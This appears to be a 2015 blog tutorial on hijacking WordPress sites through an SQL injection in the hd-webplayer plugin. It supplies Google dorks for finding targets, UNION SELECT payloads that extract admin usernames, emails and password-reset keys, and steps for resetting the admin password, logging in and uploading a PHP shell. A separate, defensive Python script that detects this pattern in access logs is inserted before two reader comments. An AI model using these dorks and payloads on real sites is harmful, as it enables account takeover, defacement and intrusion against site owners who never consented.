As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.
Watch this video tutorial for more help:
So let's begin.
I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Once you have found your site, you need to find the admin email and username.
I will be using this site as an example:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
When I add a ' the text disappears, so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now enter either the username or the email.
We can enter either, so it doesn't matter.
I entered the email.
When you get:
"Check your e-mail for the confirmation link."
it means that the reset key was successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace the key= and login= values.
So my link will be:
Enter new password:
Login with new password and shell it.
Download php shell
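Seen from the server side, the chain above shows up in the web access log as a non-integer videoid/id value sent to the plugin, followed by password-reset requests from the same client. The Python script below is an added example, not part of the original post, that flags this pattern. The log lines are constructed, and it assumes combined log format and that legitimate ids are plain integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2015:06:01:02 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3 HTTP/1.1" 200 812
203.0.113.7 - - [10/Aug/2015:06:01:09 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3%27 HTTP/1.1" 200 0
203.0.113.7 - - [10/Aug/2015:06:03:11 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.7 - - [10/Aug/2015:06:04:40 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2210
198.51.100.20 - - [10/Aug/2015:06:05:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
192.0.2.55 - - [10/Aug/2015:06:06:00 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=1%20UNION%20SELECT%201-- HTTP/1.1" 200 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
PLUGIN = re.compile(r"^/wp-content/plugins/hd-webplayer/(playlist|config)\.php$")
PARAM = {"playlist": "videoid", "config": "id"}  # parameter names from the page's dorks
INTEGER = re.compile(r"[0-9]+")  # assumption: legitimate ids are plain integers

def classify(target):
    """Label one request target, or return None if it is unremarkable."""
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    plugin = PLUGIN.match(url.path)
    if plugin:
        values = query.get(PARAM[plugin.group(1)], [])
        return "sqli_probe" if any(not INTEGER.fullmatch(v) for v in values) else None
    if url.path == "/wp-login.php":
        action = query.get("action", [""])[0]
        return {"lostpassword": "reset_request", "rp": "reset_use"}.get(action)
    return None

def detect(log_text):
    """Map client IP -> alert; a reset after a probe from the same IP escalates."""
    events = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        kind = classify(m.group(2)) if m else None
        if kind:
            events.setdefault(m.group(1), []).append(kind)
    alerts = {}
    for ip, kinds in events.items():
        if "sqli_probe" in kinds:
            later = kinds[kinds.index("sqli_probe") + 1:]
            chained = "reset_request" in later or "reset_use" in later
            alerts[ip] = "sqli_then_password_reset" if chained else "sqli_probe"
    return alerts

if __name__ == "__main__":
    for ip, alert in detect(SAMPLE_LOG).items():
        print(ip, alert)
```

A lost-password request on its own (198.51.100.20 in the sample) is normal traffic and is not flagged; only a reset that follows a probe from the same client escalates.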
2 Responses to "How to hack wordpress website with Sqli vul.+ shell upload+ deface [video]"
hahahah That All Is Fake Bro IF U teaching here hAcking then what happen as
meet me em i Innocents HAck3r Here
August 10, 2015 at 6:23 AM